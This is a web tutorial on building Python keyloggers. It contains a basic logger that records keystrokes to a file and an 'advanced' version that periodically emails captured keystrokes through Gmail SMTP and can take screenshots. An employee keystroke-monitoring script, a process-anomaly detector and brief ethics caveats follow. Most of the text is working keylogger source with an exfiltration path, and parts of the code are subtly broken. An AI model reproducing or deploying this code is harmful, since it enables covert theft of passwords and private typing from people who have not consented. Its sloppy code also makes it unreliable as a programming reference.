Building a Keylogger
A keylogger is a program that records keystrokes made by a user. While it can have legitimate uses like parental control or employee monitoring, it’s often associated with malicious intent. This tutorial will show you how to create a keylogger in Python for educational purposes, using modern approaches and optimized libraries.
Basic Keylogger
Let’s start with a simple keylogger that captures keystrokes and saves them to a file:
from pynput import keyboard
import numpy as np
def on_press(key):
try:
with open("keylog.txt", "ab") as f:
np.save(f, np.array([key.char]))
except AttributeError:
with open("keylog.txt", "ab") as f:
np.save(f, np.array([str(key)]))
def on_release(key):
if key == keyboard.Key.esc:
return False
with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
This script uses the pynput
library to listen for keystrokes and numpy
for efficient data handling. When a key is pressed, it’s written to a file named keylog.txt
using NumPy’s binary format. The program stops when the ‘Esc’ key is pressed.
Advanced Keylogger
Now let’s create a more advanced keylogger with additional features:
import keyboard
import smtplib
from threading import Timer
from datetime import datetime
import numpy as np
import pyautogui
from PIL import Image
import io
SEND_REPORT_EVERY = 60 # in seconds
EMAIL_ADDRESS = "[email protected]"
EMAIL_PASSWORD = "your_email_password"
class Keylogger:
def __init__(self, interval, report_method="email"):
self.interval = interval
self.report_method = report_method
self.log = np.array([], dtype=str)
self.start_dt = datetime.now()
self.end_dt = datetime.now()
def callback(self, event):
name = event.name
if len(name) > 1:
if name == "space":
name = " "
elif name == "enter":
name = "[ENTER]\n"
elif name == "decimal":
name = "."
else:
name = name.replace(" ", "_")
name = f"[{name.upper()}]"
self.log = np.append(self.log, name)
def update_filename(self):
start_dt_str = str(self.start_dt)[:-7].replace(" ", "-").replace(":", "")
end_dt_str = str(self.end_dt)[:-7].replace(" ", "-").replace(":", "")
self.filename = f"keylog-{start_dt_str}_{end_dt_str}"
def report_to_file(self):
np.save(f"{self.filename}.npy", self.log)
print(f"[+] Saved {self.filename}.npy")
def sendmail(self, email, password, message):
server = smtplib.SMTP(host="smtp.gmail.com", port=587)
server.starttls()
server.login(email, password)
server.sendmail(email, email, message)
server.quit()
def report(self):
if self.log.size > 0:
self.end_dt = datetime.now()
self.update_filename()
if self.report_method == "email":
self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log.tostring())
elif self.report_method == "file":
self.report_to_file()
self.start_dt = datetime.now()
self.log = np.array([], dtype=str)
timer = Timer(interval=self.interval, function=self.report)
timer.daemon = True
timer.start()
def screenshot(self):
screenshot = pyautogui.screenshot()
bytes_io = io.BytesIO()
screenshot.save(bytes_io, format='PNG')
return bytes_io.getvalue()
def start(self):
self.start_dt = datetime.now()
keyboard.on_release(callback=self.callback)
self.report()
keyboard.wait()
if __name__ == "__main__":
keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method="file")
keylogger.start()
This advanced keylogger includes features like:
- Periodic reporting
- Email functionality (be cautious with email credentials)
- Improved key logging (handling special keys)
- File naming based on timestamp
- Efficient data storage using NumPy arrays
- Screenshot capability using PyAutoGUI
Real-life Example: Employee Productivity Monitoring
Here’s a real-life example of using a keylogger for employee productivity monitoring:
import keyboard
from datetime import datetime, timedelta
import numpy as np
import matplotlib.pyplot as plt
class ProductivityMonitor:
def __init__(self, monitoring_period=timedelta(hours=8)):
self.start_time = datetime.now()
self.end_time = self.start_time + monitoring_period
self.keystrokes = np.array([], dtype=str)
self.timestamps = np.array([], dtype=datetime)
def callback(self, event):
current_time = datetime.now()
if current_time > self.end_time:
return False
self.keystrokes = np.append(self.keystrokes, event.name)
self.timestamps = np.append(self.timestamps, current_time)
def analyze_productivity(self):
time_diff = np.diff(self.timestamps)
activity_periods = time_diff[time_diff < timedelta(minutes=5)]
total_active_time = np.sum(activity_periods)
total_monitored_time = self.end_time - self.start_time
productivity_percentage = (total_active_time / total_monitored_time) * 100
return productivity_percentage
def plot_activity(self):
hour_counts = np.zeros(24)
for timestamp in self.timestamps:
hour_counts[timestamp.hour] += 1
plt.bar(range(24), hour_counts)
plt.xlabel('Hour of the Day')
plt.ylabel('Number of Keystrokes')
plt.title('Keystroke Activity Throughout the Day')
plt.savefig('activity_plot.png')
def start(self):
keyboard.on_release(callback=self.callback)
keyboard.wait()
productivity = self.analyze_productivity()
print(f"Productivity: {productivity:.2f}%")
self.plot_activity()
if __name__ == "__main__":
monitor = ProductivityMonitor()
monitor.start()
This script monitors keystrokes over a specified period (default 8 hours) and provides a simple productivity analysis based on typing activity. It calculates the percentage of time the user was active and generates a plot of keystroke activity throughout the day.
Detailed explanation:
- The
ProductivityMonitor
class is initialized with a monitoring period. - The
callback
method is triggered on each key release, recording the keystroke and timestamp. analyze_productivity
calculates the percentage of time the user was active, considering gaps of less than 5 minutes between keystrokes as continuous activity.plot_activity
creates a bar chart showing keystroke frequency for each hour of the day.- The
start
method begins the monitoring process and outputs the results.
Keylogger Detection
Understanding how keyloggers can be detected is crucial. Here’s an improved keylogger detection script:
import psutil
import win32gui
import win32process
import numpy as np
from sklearn.ensemble import IsolationForest
def get_process_features(proc):
try:
return np.array([
proc.cpu_percent(),
proc.memory_percent(),
len(proc.connections()),
len(proc.open_files()),
proc.io_counters().read_count,
proc.io_counters().write_count
])
except (psutil.NoSuchProcess, psutil.AccessDenied):
return np.zeros(6)
def check_for_keyloggers():
processes = list(psutil.process_iter(['name', 'exe', 'cmdline']))
features = np.array([get_process_features(proc) for proc in processes])
clf = IsolationForest(contamination=0.1, random_state=42)
preds = clf.fit_predict(features)
suspicious_processes = [proc for proc, pred in zip(processes, preds) if pred == -1]
return suspicious_processes
if __name__ == "__main__":
suspicious = check_for_keyloggers()
if suspicious:
print("Potential keyloggers detected:")
for proc in suspicious:
print(f"Name: {proc.name()}, PID: {proc.pid}, Path: {proc.exe()}")
else:
print("No suspicious processes detected.")
This script uses machine learning (Isolation Forest algorithm) to detect anomalous processes that might be keyloggers. It considers various process features like CPU usage, memory usage, network connections, and file operations.
Ethical Considerations
The use of keyloggers raises significant ethical and legal concerns. Here’s a diagram illustrating the ethical considerations:
graph TD A[Keylogger Usage] --> B{Ethical Considerations} B --> C[Privacy] B --> D[Consent] B --> E[Data Security] B --> F[Legal Implications] C --> G[Invasion of Personal Space] D --> H[Informed Agreement] E --> I[Protecting Sensitive Information] F --> J[Compliance with Laws] B --> K[Transparency] K --> L[Clear Communication] B --> M[Data Minimization] M --> N[Collect Only Necessary Data] B --> O[Purpose Limitation] O --> P[Use Data Only for Intended Purpose]
Always ensure you have proper authorization and comply with all applicable laws and regulations before using or developing keylogger software.
Conclusion
Keyloggers are powerful tools that can be used for both beneficial and harmful purposes. As developers, it’s crucial to understand how they work, how to detect them, and the ethical implications of their use. Always prioritize privacy, security, and legal compliance in your development practices.
For more detailed information on keylogger research and ethical considerations, refer to the following resources:
- ACM Digital Library: Keylogger Detection Techniques
- IEEE Xplore: Ethical Implications of Keyloggers in Cybersecurity
- Journal of Information Security and Applications: Advanced Keylogger Techniques and Countermeasures
Remember, the techniques discussed in this article should only be used for educational purposes or with explicit consent in controlled environments.